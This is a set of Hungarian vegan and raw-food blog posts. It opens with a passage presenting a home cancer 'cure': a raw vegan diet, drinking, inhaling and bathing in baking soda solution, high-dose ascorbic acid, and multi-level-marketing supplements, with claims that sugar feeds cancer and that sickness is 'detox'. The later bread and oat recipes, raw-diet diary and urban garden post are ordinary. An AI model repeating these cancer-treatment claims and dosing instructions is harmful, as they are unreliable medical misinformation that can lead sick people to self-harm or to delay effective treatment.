megszüntetésében sokat segíthet egy jó szakember. Mi egy jóbarátunk segítségét kértük, aki Reikivel (energetikai kezeléssel) és finom stresszoldással foglalkozik. Az ő engedélyével megosztom nevét és elérhetőségét is. Pápai Veronika, 06-70/428-0173 Két öngyógyító meditációt is rendszeresen végeztünk közösen: https://www.youtube.com/watch?v=QiqIHbjCZcM https://www.youtube.com/watch?v=m2ocCDNmtsQ Testi okok: Testi szinten is rengeteg dolog elősegíti a betegségek vagy jelzések kialakulását. Az egyik ilyen az állati termékek fogyasztása, és itt főként az álati fehérjék, túlzott zsír és cukor, valamint a rengeteg finomított, feldlgozott, hőkezelt ételre gondolok, melyek olyan messze állnak a természetes álapottól, hogy nem csoda, ha megbetegítik a testet. Fontos megérteni, hogy minden amit a modern ember eszik, gyakorlatilag természetellenes. Kerülnünk kell a rákosodásra hajlamosító állati fehérjék bevitelét, a finomított cukrot (Csak természetes cukortartalmú ételeket fogyasszunk!) és minden hozzáadott cukrot tartalmazó ételt, hiszen a cukor a rákos sejtek fő tápláléka! A magas zsírbevitel szintén kerülendő, hiszen gyulladáskeltő hatású. Ha meg akarunk gyógyulni, nem csak lelkileg kell élhető állapotba hozni magunkat, hanem testi szinten is! Ez pedig csak élő ételekkel lehetséges! Halott dolgokkal nem tudunk segíteni senkin, akinek az életre van szüksége! Mivel valószínűleg évtizedek óta savasodást okozó ételeket-italokat fogyasztunk, ezért lugosító hatású ételekt kell ennünk! Ajánlott tudományos irodalom, a világ legátfogóbb táplálkozástudományi tanulmánya, közérthető formában: Dr. T. Colin Campbell: A kína tanulmány http://www.libri.hu/konyv/thomas_m_campbell.kina-tanulmany.html Fél órás interjú Dr. T. Colin Campbellel a Kína tanulmányról, magyar felirattal: https://www.youtube.com/watch?v=enL1v9BMhnI Dr. Leonard Coldwell beszél a rák gyógyíthatóságáról és a táplálkozásról: https://www.youtube.com/watch?v=4saHaijltBw Étkezés: A kína tanulmány bebizonyította, hpgy az állati fehérjék fogyasztása erősen összefügg a daganatos betegségek kialakulásával! Éppen ezért k erülni kell minden állati fehérjét, így a megfelelő étrendnek törvényszerűen tisztán növényinek kell lennie! Ezzel együtt a Kína tanulmány által az is bizonyított, hogy semmilyen hiánybetegségtől nem kell tartanunk ha növényi étrendre térünk át! Ámde növényi, vagy vegán étrendből is van több féle. Mivel életbevágó, hogy az életet erősítsük magunkban, ezért a halott dolgok bevitelét is el kell hagyni, vagyis semmilyen hőkezelt étel fogyasztása nem ajánlott! A hökezelt növényi étrend megvéd ugyan attól, hogy állati fehérje kerüljön szervezetünkbe, ezzel pedig egy jelentős kiváltó okot kerülünk el, ámde a vitaminok és enzimek nélkül a növények is csak halott ásványi tápanyaggal látnak el minket! Minden hökezelési eljárás (párolás, főzés, sütés, fagyasztás) Megöli a növényeket, és tönkreteszi a növényekben található vitaminokat és élő enzimeket, melyekre ebben az álapotban testünknek leginkább szüksége van! A fenti elvek mentén a legideálisabb étrend a 100%-ban nyers, alacsony zsír és fehérje tartalmú növényi étrend! Ennek teljes betartása pedig vízválasztó lehet! Fontos hogy a nyers étkezésre való áttéréskor nagyon erős méregtelenítési folyamtok indulnak el a testben, amikor az évtizedek alatt lerakódott méreganyagok jelentős része hirtelen felszabadul a zsírszövetekből, és a kiürülés testi folyamatainak engedelmeskedve a véráramba kerül! Ez azt jelenti, hogy az első héten fejfájás, hányinger, erős hasmenés, levertség, és általános rosszullát jelentkezhet! Ettől nem szabadmegilyedni, mert természetes öntisztuló folyamatról van szó, mely általában 2-4 nap alatt elmúlik! Nagyon fontos, hogy minimum napi 3liter tiszta vizet igyunk, mert a méreganyagokat a vesénk csak megfelelő mennyiségű víz jelenléte mellett tudja kivákasztani a véráramból! Ajánlott irodalom: Dr Douglas N. Graham: 80-10-10 http://www.elixirbolt.hu/hu/webaruhaz/onismeret/801010 Szintén jó könyv még Victoria Boutenkótól a Nyers étel csodája, bár az étrend itt nem a 80-10-10 elveit követi, fontos, hogy mi aszerint étkezzünk! http://www.libri.hu/konyv/victoria_boutenko.a-nyers-etel-csodaja-1.html Táplálék kiegészítők/vitaminok és beszerzésük: Szódabikarbóna: A lúgosítást elősegithetjük például szódabikarbóna fogyasztásával. Ez az egyszerű anyag 250g-os kiszerelésben kapható bármely gyógyszertárban. Használatához 5 tömegszázalékos oldatot kell készítenünk belőle. Ennek módja, hogy 950g desztillált vízhez 50g szódabikarbónát keverünk. Ebből az oldatból minden reggel, éhgyomorra igyunk meg egy decit. Ha a tumor olyan helyen van, holy ezzel az oldatal akár részlegesen is elérhetjük, (pl tüdő, méh, végbél), akkor a testüreg öblögetése az oldattal, naponta 1-3 alkalommal ajánlott. Tüdődaganat esetén egy prolasztó inhalátorból lélegezzük be az oldatot 15-30 percen keresztül minden nap! Hetente két teljes fürdés ilyen oldatban szintén ajánlott. Nyugodtan üldögéljünk az oldatban! Ha anyagilag túl megterhelő ilyen mennyiségű szódabikarbóna beszerzése, akkor minimum öblítsük végig a testünket háromszor. Az öblítések között hagyjunk 1-3 perc szünetet. Ez 2 liter oldattal bőven kivitelezhető, és heti két alkalommal ismétlendő! Dr Tulio Simoncini beszél a rák szódabikarbónával történő gyógyításáról, és arról, hogy mi is a rák valójában: https://www.youtube.com/watch?v=B8T0uOuYyGw&feature=youtu.be&t=8m32s Aszkorbinsav: Szintén bármely gyógyszertárban beszerezhető 50g-os kiszerelésben. Napi 5g bevitele ajánlott! Célszerű turmixba tenni, hogy a természetes vitaminok, enzimek segítsék a tömény C-vitamin hasznosulását! A C-vitamin nagyon erős rákellenes szer, és ebben a mennyiségben komoly bajt nem okoz. A vesebetegeknek ajálott odafogyelni, mivel nagyon ritkán a vesekő kialakulását segítheti a nagy mennyiségű aszkorbinsav bevitel! Vesegörcs esetén csökkentsük a bevitelt arra a legmagasabb dózisra, ami még nem okoz görcsöt! Illetve ha bizonyos idő elteltével nő a vesék érzékenysége, akkor hagyjunk 2 hét pihenőt, mielőtt folytatnánk az aszkorbinsav emelt szintű fogyasztását. Kurkuma, gyömbér és fahéj: Mindhárom fűszernövény erős, rákellenes hatóanyagokat tartalmaz, így fogyasztásuk szintén ajánlott! A kurkumin felszívódását a feketebors és a chili paprika anyagai megsokszorozzák, ezért én a következő keveréket ajánlom: 10g kurkuma, fél kiskanál fekete őrölt bors, egy csipet őrölt chayenne bors (chili por). Ebből a keverékből 2 kiskanálnyit ajánlott fogyasztani egy pohár turmix mellé. A fahéjporból szintén 2 kiskanálnyi az ajánlott adag, de ezt csak akkor alkalmazzuk, ha az előbbi keveréket nem bírja a gyomrunk, mivel nincs annyira erős hatása, mint a kurkumás keveréknek! Zöld turmix alap recept: 2 alma, csak magozva, nem hámozva! 3 érett (barna foltos héjú) banán, 2 marék spenót levél, fél citrom leve, kisujjnyi darab gyömbér, fél mokkáskanál fahéj, 3dl víz, fél mokkáskanál aszkorbin sav. Fontosnak tartottuk, hogy a maximumra turbózzuk a vitamin és tápanyagbevitelt, ezért kifejezetten rákellenes és immunerősítő hatással bíró, táplálék kiegészítő termékeket is nagy mennyiségben fogyasztott édesapám. Mi a Forever Living Products termékeit használtuk a következő adagokban: Naponta 2x0,5dl aloe vera gél, 2x0,5dl pomesteen, 2x3 Lycium, 2x2 immublend. Ha nincs olyan személy, akin keresztül be tudod szerezni ezeket a termékeket, akkor itt az én kontaktom (nyugodtan kérj személyre szabott ajánlást!): Szabó Zsuzsanna, Telefon: 06-20/519-2149. Hivatkozz erre a blogbejegyzésre A terápia összefoglalva: - Dohányzás, alkohol, hús, tojás tejtermékek, és minden állati származék elhagyása - Nyers vegán, alacsony fehérje és zsír tartalmú étrend. -> 80-10-10 - Az első 3 nap csak zöld turmix! (Emésztőrendszer tisztítása, ezáltal a felszívódás javítása) Minden reggel 2dl, 5%os szódabikarbónás oldat elfogyasztásával indítottunk - 30 percel később 1 dl frissen préselt búzafű lé (Zöld árpafűlé is lehet, ez utóbbi nem okoz hányingert, a búzafűlé okozhat!) - Aztán minimum 30 perccel később elkezdtük a délelőtti zöld turmix fogyasztását. Minden délelőtt egy liter zöld turmixot ivott. (Bevált recept: 2 alma héjastól de kimagozva, 3 érett barna foltos héjú banán, 2 marék spenótlevél, fél citrom leve, 2-3dl víz, egy mokkás kanál őrölt fahéj, fél mokkáskanál "kb 2g" aszkorbinsav) - Napi 3 liter tisztított víz bevitele (frissen facsart citromlével és kevés aszkorbinsavval ízesítve) - Naponta összesen 5g aszkorbinsav, lehetőleg gyümölcsökkel együtt fogyasztva, hogy a természetes vitaminok, enzimek segítsék az aszkorbinsav felszívódását. Kevertük turmixba, vízbe. - Naponta egy kiskanál az alábbi keverékből: (10g kurkuma, fél kiskanál fekete őrölt bors, egy csipet őrölt chayenne bors.) - Naponta 15-30 perc inhalálás 5 tömegszázalékos szódabikarbónás vízes oldattal, inhalátorból! (A felmelegített oldat gőzének belégzése ebben az esetben nem hatásos!) - Hetente kétszer 5% szódabikarbónás oldatban való fürdés, hajmosás. (Nyugodtan lehet üldögélni az oldatban) Rendkívül fontos felismerni, hogy csak radikális és tartós életmód változás hozhat hosszútávú és gyors eredményt, ezért minimum a tisztán növényi, vegán étrend megtartása még a teljes gyógyulás után is ajánlott. A teljes gyógyulásig a szigorú nyers étrendet nem szabad fellazítani! Az itt olvasott tudás váljon egészségedre és boldoguláodra! További kérdésekre is szívesen válaszolok telefonon, mert az email-es kapcsolattartás nagyon sok időmet veszi el (rengeteg segítségkérő emailt kaptam), és nem tudok mindenkinek válaszolni. Szóban gyorsabb és pontosabb a kommunikáció. Ehhez kérlek a veganmoral@gmail.com emailcímre küld el kérdéseidet és telefonszámod. Amint tudlak, felhívlak! Légy Áldott! Üdvözlettel, Kakuk Bálint
Reggelire fel! - Sokmagos házi teljeskiőrlésű tönkölybúza kenyér (laktózmentes, vegán)
2015. április 14. Zöld Avocado
sokmagos házi teljeskiőrlésű tönkölybúza kenyérElérkezett ez a pillanat is! Megsütöttem életem első kenyerét! :-) Pár éve mikor divatba jöttek az otthon használatos kenyér sütők, én is szerettem volna egyet. De aztán elkezdtünk világot látni, és nem tűnt praktikus döntésnek egy kenyérsütővel a hónunk alatt költözgetni egyik országból a másikba. Így le is tettem az otthoni kenyérsütés öröméről. ;-) Most, pár évvel később, hogy nagy életmód váltásban vagyunk, és igyekszem a lehető legtöbb ételünket minél természetesebb, és egészségesebb módon idehaza elkészíteni, újra előkerült a házi kenyér gondolata. Úgy döntöttem, nem kell nekem kenyér sütő, menni fog ez anélkül is! Sőt! Még normális kenyér formájú sütő formám sincs itthon, de kit érdekel, hogy néz ki??? Az íze a lényeg, nemde?! ;-) Mint a korábban készített brokkolis sajtos krumpli, vagy a nemrégiben készített almás-fahéjas zabmorzsa ... és még sorolhatnám. Mindegyik Ronda, és finom! :-) Ugyan nem olyan laza, és puha a teljeskiőrlésű tönkölybúzából készült pékáru, mint egy hagyományos fehér kenyér, de annál sokkal egészségesebb, tápanyagban-, vitaminokban-, ásványi anyagokban- és rostban gazdag. Kisebb mennyiségben laktatóbb, és könnyedén bármikor elkészíthető ez a finom és telt házi magos kenyér. sokmagos házi teljeskiőrlésű tönkölybúza kenyér És hogy miért is jobb teljeskiőrlésű búzalisztet fogyasztani a hagyományos, olcsó, búzaliszt helyett? És mi az a tönkölybúza? Megtudhatjátok, a következő bekezdésekből. ;-) "Teljes kiőrlésű búzaliszt: A teljes kiőrlésű lisztekben a gabona korpája is megtalálható, amely tápanyagokban gazdag és segíti az emésztést. Használja egészsége érdekében sütéshez-főzéshez, akár finomliszttel fele-fele arányban keverve. A teljes kiőrlésű gabonákból készült termékek amellett hogy sok hasznos élelmi rostot, vitamint és ásványi anyagot (E-vitamin, B-vitamin, kálium, kalcium, magnézium, foszfor) tartalmaznak, segítenek megelőzni a rák, a cukorbetegség és a szívbetegségek kialakulását is. Sokan nem szeretik a csak teljes kiőrlésű gabonából készült kenyereket, mert enyhén savanykás az ízük. Ők nyugodtan fogyasszanak olyan kenyeret ami részben készül teljes kiőrlésű lisztből, részben pedig fehér lisztből. Tönkölybúza liszt: A tönkölybúza kiváló beltartalmi és élettani hatású gabona. A tönkölybúzából készült termékek pozitív jelentőségűek. A jobb életminőség fenntartása érdekében fogyasszunk minél több természetes eredetű élelmi anyagot. Fehérjetartalma magas és könnyen emészthető. Aminosav-tartalma és annak összetétele a gabonafélék közül a legkedvezőbb. A vitamin- és ásványianyag-tartalma a közönséges búzához képest annak többszöröse." Forrás:Bioliget.hu sokmagos házi teljeskiőrlésű tönkölybúza kenyér HOZZÁVALÓK: - 300 g teljeskiőrlésű tönkölybúza liszt - 300 g (glutén mentes) élesztős fehér liszt - 1 tasak instant élesztő por - 100 g sós mag mix (napraforgó, tökmag, szezámmag, lenmag, kendermag, mák stb. keveréke) - 2 tk himalája só - 200 ml kézmeleg víz - 200 ml langyos rizs tej - 1 tk demerara cukor vagy jó minőségű barna cukor ELKÉSZÍTÉS: Kenyeret készíteni, egyáltalán nem bonyolult, csak időigényes. A liszteket, az élesztőt, és a sót összekeverem kézzel, hogy levegő jusson a tésztába. Hozzáadom a magokat, de 1 marékkal félre teszek későbbre. A tészta alapanyag közepébe lukat formázok, és beleöntöm a langyos tejet. Hozzáadom az édesítőt, és elkezdem kézzel összedolgozni a tésztát. Közben hozzá adagolom a kézmeleg vizet. Az egészet egy nyálkás tésztává ,,dagasztom kézzel. Ha kell még vizet, vagy lisztet teszek hozzá, annak függvényében, hogy milyen állagú a tészta. Könnyed, nyúlós kelt tésztát kellene kapnunk. Persze nem olyan könnyedet, mint egy hagyományos fehér lisztes kelt tésztánál, de azért próbálkozzunk. ;-) Ha készen vagyunk konyharuhával letakarva a sütőbe tesszük, egy alsó rácsra. Közben bekapcsoljuk a sütőt 50°C fokra (nem kell előmelegíteni), és 60 percre bent hagyjuk a tésztát melegedni. Félidőben kivesszük, és egy kicsit kézzel meglazítjuk a tésztát, majd visszatesszük a mesterséges ,,napra. Természetesen ha szerencsénk van, és odakint süt az igazi nap, akkor spórolhatunk az árammal, és kitehetjük a tésztát egy ablak párkányba, vagy a teraszra. A nyers tészta is boldogabb lesz a természetes napfénytől! ;-) Miután letelt az 1 órás sütős szauna, kiveszem a tésztát, és átteszem a végső formájába. Ez lehet egy szilikonos kenyérforma, vagy akár egy hosszúkás sütő forma papírral bélelve. Nekem egyik sincs itthon, így kerestem egy méretre megfelelő jénait, kibéleltem a sütőpapírral, és beletettem a kelt tésztát. Kicsit eligazgattam, hogy kenyér formája legyen, megszórtam a korábban félretett mag-mixel, és bevagdostam a tetejét. Letakarva visszatettem a már lekapcsolt -de még langyos- sütőbe az így kapott végleges tésztát még egy fél órára kelni. Miután ez a fél óra is lejárt, levettem a konyharuhát, bekapcsoltam a sütőt 200°C fokra, és fél órára betettem sülni a kenyeret, hogy most már tényleges ehető formáját is elérje. Ennyi! Ugye, hogy nem bonyolult, csak időigényes?! ;-) Nem lett tökéletes, de az, hogy mind elfogyott, és nem a kukában landolt, jelent valamit. Persze azért még majd próbálkozom egyéb receptekkel is, és ha találok valami jót, akkor megosztom veletek is. sokmagos házi teljeskiőrlésű tönkölybúza kenyér, házi brokkoli krémmel Jó étvágyat hozzá! Megjegyzés1: a sok sós mag, ami a kenyér belsejében van morzsalékosabbá teszi a beltartalmat, hisz térfogat foglalók, így a kenyér tészta nem tud összeállni egyneművé. Ha ez zavar, akkor rakj kevesebb magot a tésztába, vagy daráld le amilyen kicsire csak tudod. Mi szeretjük rágcsálni a sós magokat, így minket a kenyérben sem zavart. :-) sokmagos házi teljeskiőrlésű tönkölybúza kenyér Megjegyzés2: Hogy mennyi mindenre használjuk mi magyarok a kenyeret, és milyen elképesztő kenyéfeltétekkel lehet találkozni más országokban, bővebben olvashattok egy korábbi bejegyzésben itt a Zöld Avocadón.
Kerek két hónapja nyers koszton
2015. április 1. Sose mondd, hogy soha
Ma vagyok 2 hónapos nyers :) Ez alkalomból visszatekintés és helyzetjelentés következik. Tavaly március 12-én határoztam el, hogy nyersvegánként élem tovább napjaim. Ezt követte közel 11 hónap próbálkozás, visszaesés, újrakezdés, bukdácsolás, ami alatt sokat tanultam magamról és az étkezésről is. S most február 1 óta fixen, visszaesés mentesen eszem csak nyers gyümölcsöt, zöldséget és magokat. (Saját kompromisszumom, hogy a fagyasztott gyümölcsöket a nyersek közé sorolom, noha szigorúan véve nem azok.) turmix alapanyagok összekészítve Hogy miket eszem? Változó, de mostanában nap közben főleg gyümölcsturmixot banánból, almából, datolyából, fagyasztott piros gyümölcsökből, egyre több friss spenót levéllel zöldítve. Mellette néha aszalt szilva+datolya+dió kombót nassolok. Este pedig jön a várva várt nagy tál saláta paradicsommal, uborkával, és öntetnek a kedvenc magtejfölöm fokhagymával, citromlével napraforgómagból és pár szem mandulából. Drágának hangozhat, de összességében nem költök többet élelmiszerre, mint korábban, mert annyi minden kiesik, például a kávé, az édességek, meg ilyenek. Nincs rájuk szükségem. A nyers étkezéssel összefüggésben nincs szükségem ezen kívül fejfájás csillapítókra és arckrémekre. Tegnap bőrig ázva, csontig átázott cipőben töltöttem 3-4 órát este, rázott a hideg, biztos voltam benne, hogy lebetegszem, de semmi. Erősebb, egészségesebb, nyugodtabb vagyok így, mint korábban. Azt viszont nagyon fontosnak tartom, hogy az étkezés önmagában még nem elegendő. A testmozgás épp ugyanilyen fontos. Reggelenként futok 15-20 percet közepes tempóban a kutyákkal és utána végigcsinálom először ezt a 10 perces kis jógavideót utána pedig ugyanattól a szimpatikus hölgytől egy picit húzósabbat, ezt a másik 10 perces gyakorlatot. Kezdetben csak 5-10 perc futás volt és csak a könnyebbik jóga sor, az is bőven elég volt, de szép lassan növelem, talán még fogom is, de ez most így számomra tökéletes. Nagyon szeretek így élni. Szerencsésnek érzem magam, hogy megkaptam mindazt a hatást és segítséget, ami kellett. Hálás vagyok sokaknak. A teljesség igénye nélkül például Timinek a motiváló blogjáért és a máktej receptért, Mirának a könyvért, ami alapjaiban változtatta meg azt, ahogyan magamhoz viszonyulok, Bettinek a magtejföl receptért, és persze Daninak, nagyon hosszú lenne felsorolni mi mindenért. egy gyümölcsevő kolléga:)Szeretném elmondani másoknak, hogy mennyivel jobb így élni, mert nagyon elszomorít, amikor azt látom, hogy az emberek milyen rosszul érzik magukat a testükben. De tudom, hogy ez az étrend vadul hangzik és nehéz is az átállás. Szeretnék segíteni is. Az új tervem, hogy ha Dani ráér májusban segíteni nekem, akkor csinálok videócsatornát a témának, mert angolul rengeteg van, de magyarul nem nagyon láttam még. Olyat szeretnék, ami egyszerű, ami kezdőknek való, mint ez a blog is. Nem vagyok szakértő, tanuló vagyok, de szerintem az jó kiinduló pont, hogy nincs tanár és tanító, hanem mindannyian tanulók vagyunk. A lényeg, hogy egy-egy rossz élmény vagy sikertelenség miatt ne adjuk fel, bocsássuk meg magunknak a tökéletlenséget és haladjunk tovább előre. Ha én gyümölcsevővé tudok válni, én aki nem szerettem se a paradicsomot, se az almát, se a banánt, sőt ha nem volt muszáj, még vegánként is akár hónapokig nem ettem gyümölcsöt azelőtt... szóval ha nekem sikerül, akkor bárkinek sikerül. Ha szeretné :)
Városi Paradicsom
2015. március 28. Zizi kalandjai
A kertészkedés öröme gyerekkoromból ered. A szüleim által megtanultam a kemény munkát: gaztalanítottam, locsoltam, ültettem, gondoztam a zöldségeket, gyümölcsfákat az öcsémmel együtt. Néha lelkesen, néha kevésbé, mert jobban szerettünk volna a játszótéren maradni a barátainkkal, de nekünk menni kellett a kertbe helyette kapálni. Néha sérelmeztem a dolgot, de most már tudom, hogy jobb volt keményen dolgozni és egész nap a levegőn lenni, mint a játszótéren fecsegni és lógni a barátokkal. Ezért nagyon belelkesültem, amikor először olvastam a Városi Paradicsomról. Nagyon szuper a projekt, lázba is hozott. Annyira szeretnék egy parcellát! Talán most már Ádival is tudnánk együtt gondozni. Volt parcellánk az elmúlt években a Millenárison (mini parcella), de sajnos gyerekkel nagyon nehezen működött a gondozása: első évben még Ádi kicsi volt, szoptatni kellett és mellette nehéz volt kertészkedni, csak úgy tudtam, ha I. vagy a nagyszülők is eljöttek velem és addig vigyáztak Ádira (vagy fordítva, ők kertészkedtek, én meg babáztam). Tavaly már nagyobb volt, de még pont az a kategória, amikor nem érti meg, hogy miért nem szabad a növényekre rálépni, letépkedni más paradicsomát, stb. Most áprilisban lesz 2 éves, szóval talán menne vele együtt a kertészkedés, mert minden vágyam – a városi és lakás lét ellenére -, hogy megmutassam neki, honnan kerül az étel az asztalra. Ráadásul nagyon jó étvágyú gyerek és mindent imád nyersen is, szóval királyság lenne, ha tépkedné a mángoldot és enné a kertből. Vesd bele magad! felkiáltással indult el a Városi Paradicsom kezdeményezése, amely megreformálhatja az urbánus kertészetet a fővárosban. A volt Ferencvárosi Kikötő területén, eddig kihasználatlan, elhagyatott Duna-parti sávon nyílik meg a Magyarországon egyedülálló közösségi föld. Az újdonsült kertészek szinte készen kapják meg a parcellákat, amelyeken a szervezők segítségével 20 féle zöldséget termeszthetnek majd májustól októberig. Az előre megmunkált, bevetett területen az öntözés is automatizált. A bérlőknek csak a kertészkedés öröme – a gondozás és a szüret – marad meg, ez csupán heti egyszeri alkalommal jelent pár óra munkát. A vegyszermentes, 40m?-es parcellák akár egy 4 fős család egész zöldségkészletét biztosíthatják a szezon alatt. Az urbánus kertészet már évek óta jelen van Budapesten, a mostani kezdeményezés azonban attól egyedülálló, hogy nagyobb területet és ezáltal jelentős hozamot biztosít a közösségnek, fenntartói gondoskodnak a vetőmagok, palánták beszerzéséről, ültetéséről, az öntözésről és folyamatosan tanácsokkal látják el a bérlőket. A helyszínen a kerti munkákhoz szükséges eszközök is rendelkezésre állnak majd, emellett grillpulttal, szalonnasütővel, kerti játékokkal, vagyis a szabadidő minél tartalmasabb eltöltését lehetővé tevő kiegészítőkkel is készülnek a szervezők. “Találtunk egy olyan területet, amely eddig méltatlanul állt üresen, ezt hasznosítottuk újra, hogy kialakítsuk az első közösségi földet a fővárosban. Kertészmérnökök és mezőgazdasági szakemberek segítségével, nyugati minta alapján sikerült a közel 3 hektáros, Duna-parti telken egy olyan helyet létesítenünk, ahol tavasztól őszig a kertészkedés mellett kikapcsolódni is járhatnak családok, barátok.”- mondta el Nádori Eszter, a Városi Paradicsom Kft. ügyvezetője. A Városi Paradicsom néhány parcelláját az a Budapest Bike Maffia kapta meg az alapítóktól, akik idén elnyerték a Highlights of Hungary díját, mint a legkreatívabb társadalmi kezdeményzés. Rajtuk keresztül a Városi Paradicsom zöldségei rászoruló családokhoz jutnak majd el! A projekt létrehozói most támogatást kérnek – Indiegogo-n keresztül -, mert a felszántott és megművelt terület mellé szeretnének létrehozni egy közösségi piknikezőt. Ez egy olyan hiánypótló hely lenne Budapesten, ahol háborítatlanul lazulhatnál idillikus környezetben, közvetlenül a Duna partján! Azt szeretnék, hogy ott mindent megtalálj, amire egy napsütéses tavaszi délután vagy éppen egy nyári estén a városban vágynál. Lesz tűzrakó bográcsfelszereléssel, korlátlan mennyiségű tűzifával. Lesz grillező hosszú, kényelmes pulttal, és minden eszközzel, amire a sütögetéshez szükséged lehet. Lesznek napozóágyak, babzsákok, függőágyak, napos és árnyékos pihenők. Tudsz majd itt tollasozni, röplabdázni, petanque-ozni, lengőtekézni. Kifekhetsz a Duna mellé napozni, vagy csak a fűbe olvasni. Egyszóval ha a városban ragadsz a nyár közepén, akkor is lesz egy hely, ahol nyaralhatsz! Városi Paradicsom elérhető az alábbi linkeken: – weboldal – Facebook oldal – támogatási oldal
Reggelire fel! - Almás-fahéjas zabmorzsa pekán dióval és mogyoróval (laktózmentes, vegán)
A nap legfontosabb étkezése még mindig a reggeli! :-) Fontos, hogy tápláló, energiadús, és ízletes étellel induljunk neki egy újabb napnak. Sokszor nem jut rá elegendő idő, vagy csak a reggeli lustaság miatt próbáljuk elcsalni ezt az étkezést, mégis fontos lenne, hogy odafigyeljünk rá! Ha a testünk, és a lelkünk is kellemesen kezdi a napot, az a nap folyamán még a hasznunkra lesz. Jobb közérzettel, több energiával, emésztési gondok nélkül, lendületesebb mozdulatokkal, szellemi frissességgel, melegebb szívvel, és mosolygósabb arccal élhetjük meg a következő 15-16 órát, ami ránk vár. ;-) Almás-fahéjas zabmorzsa pekán dióval és mogyoróval Korábbi ígéretemhez híven újabb energiadús reggeli ötlettel érkeztem, ami nem mellesleg egy személyes kedvenc. Nálunk ez egy tipikus lustizós szabadnapos reggeli. Olyan napokra, amikor tudom, hogy az ebéd sokára fog elkészülni, mert pihenés és lustálkodás lesz a program a hosszúra nyúlt délelőtt. :-) Az almás-fahéjas íz pedig tökéletes a hidegebb napokra, amik remélhetőleg egy pár hónapig nem jönnek még vissza. ;-) Pár éve, mikor Írországba költöztünk, akkor ismerkedtem meg közelebbről a zabbal, mint nagyon hasznos és értékes gabonával. Az ír reggeliző asztalokon mindennapos az ún. porridge. Ez egy natúr, tejjel készült zabkása, melyet főként mazsolával és mézzel édesítenek. Az igényesebbek már aszalt gyümölcsöket is tesznek hozzá. Híg, kása jellegű étel, ami a mi tejbegrízünkhöz hasonlít. Nekem ezek a bébipapi állagú híg ételek (pl.: főzelékek, kásák) sosem tartoztak a kedvenceim közé. Szeretem, ha van mit rágni egy ételben. Nálam egy jó tejbegríz is darabos! ;-) Az íreknél olyan gyakori a porridge, mint nálunk magyaroknál a túrórudi. :-) Utánanéztem hát egy kicsit ennek a zab dolognak, mert láttam, hogy itt milyen népszerű ez a gabona, miközben korábban Magyarországon szinte egyáltalán nem találkoztam vele. Kiderült, hogy rendkívül értékes tápanyag és még olcsó is! Sokkal értékesebb, mint az általunk oly gyakran használt búzadara. zabA zab, az egyik leglassabban felszívódó gabona fajta, ami nagyon jól jön, amikor tudjuk, hogy a reggelink és az ebédidőnk között túl sok idő tellik el. Tökéletes reggeli egy lustálkodós napon, vagy amikor elutazunk valahová... vagy pont ellenkezőleg, a magas energia és szénhidrát tartalma miatt, akkor is tökéletesen táplál minket, amikor nagyobb fizikai terhelésnek tesszük ki magunkat, vagy csak átfáztunk valahol, és szeretnénk gyorsan belülről is felmelegedni. Magas rosttartalma segít a természetes, rendszeres emésztésben. Jelentős ásványi anyag, vitamin tartalommal rendelkezik, és a 7 fontos aminósavból is nagy mennyiségben találhatunk benne. Főként telítetlen zsírokat tartalmaz, ami szintén fontos egy egészségesen működő szervezet számára. Csökkenti a koleszterin szintet, segít megelőzni a szív- és érrendszeri betegségeket, és cukorbetegek is bátran fogyaszthatják. Még hosszasan lehetne sorolni a zab előnyös tulajdonságait, de nem untatlak vele tovább titeket. Akit érdekel a téma bővebben, az olvasson utána a neten. :-) Tehát miután rájöttem, hogy be kell vinnem a mindennapi táplálkozásunkba ezt a szuper gabonát is, elkezdtünk kísérletezgetni a hagyományos ír zabkásával, a porridge-val. A cél az volt, hogy rágható, és ízletes reggeli készüljön belőle! Úgy tűnik sikerült! :-) Közel egy éve majdnem minden nap része a reggelinknek, ilyen-olyan formában. Egy ilyen nagyon finom, tápanyagdús és abbahagyhatatlan energia bomba reggelit hoztam nektek, amit úgy neveztem el, hogy almás-fahéjas zabmorzsa pekán dióval és mogyoróval. Almás-fahéjas zabmorzsa pekán dióval és mogyoróval HOZZÁVALÓK: (1 személyre) - 1 bögre zabpehely - 1 bögre növényi tej (jelen esetben a mogyorótej a legideálisabb választás) - 1 közepes alma (meghámozva) - 1 fél banán - ízlés szerint sok fahéj, egy csipet őrölt szerecsendió, és egy késhegynyi őrölt szegfűszeg - 1 marék pekán dió és mogyoró keveréke (de használhatunk sima diót, vagy brazil diót is) - (opcionálisan - 1 tk őrölt lenmag) Az 1 bögre, jelen esetben kb.2 dl - nek felel meg, és a bögrét nem tesszük tele. Kis gyomrúak, vagy "reggelizni nem szoktam" típusú olvasóim kisebb adagokat használjanak, mert ebből a mennyiségből kiadós végeredmény lesz. ELKÉSZÍTÉS: A mogyorótejet feltesszük egy lábasban a tűzhelyre forrni. Mielőtt forrni kezd, beletesszük a zabpelyhet, és a fél banánt, amit előzőleg felkockáztunk. Visszavesszük a hőfokot, és lassú tűzön, folytonos kevergetés mellett kb. 5 perc alatt megfőzzük. Ne lepődjünk meg, hogy a tej eltűnik időközben. A zab rendelkezik egy ilyen tulajdonsággal. Magába szívja a folyadékot. A banán is szétesik egy idő után, ami szintén jó, mert az édesíti meg a reggelinket, így sem mézet, sem cukrot nem kell használnunk. Amikor már úgy tűnik, hogy megfőtt a zab, azaz eltűnt a tej, és zabmorzsává vált az étel, akkor levesszük a tűzről. Hozzáadjuk a téli fűszereket, a (pekán) diót, a mogyorót, és a kisebb kockákra vágott almabelsőt (héj nélkül). Az egészet összekeverjük, és egy jó kis, mély ún. müzlis tálban tálalva vissza is ülhetünk vele a meleg takaró alá, és élvezhetjük, ahogyan minden egyes kanál újabb és újabb melegséggel járja át a testünket. Nem kell sietni az ébredezéssel! ;-) Almás-fahéjas zabmorzsa pekán dióval és mogyoróval Kezdjük a napot emészthető, tápanyagban gazdag és energiadús reggelikkel! Reggelire fel! :-) Megjegyzés1: sima dióval is finom, de a pekán dió különleges zamata tökéletesen kiegészíti az alma és a fahéj kombinációt. Megjegyzés2: aki szereti a kásás, híg állagot, az tegyen bele fele annyi zabot, és hagyja abba a főzést, még mielőtt megszilárdulna, morzsalékossá válna az étel. Így a végén igazi zabkását fog enni! Megjegyzés3: A banános képen láthatjátok, hogyan lehet gyorsan, és mosogatásmentesen feldarabolni a banánt! :-D Hagyjátok meg az alsó héjat, amikor megpucoljátok, és, mint egy tálca azon vágjátok be a banán karikákat, majd egy hússzú kereszt vágással, kész is lesznek a kicsi fél banán karikák, amik mehetnek is egyből bele a zabmorzsába / zabkásába. Nem kell utána mosogatni, és villámgyors elkészül. ;-)
Tökmagos-medvehagymás pogácsa
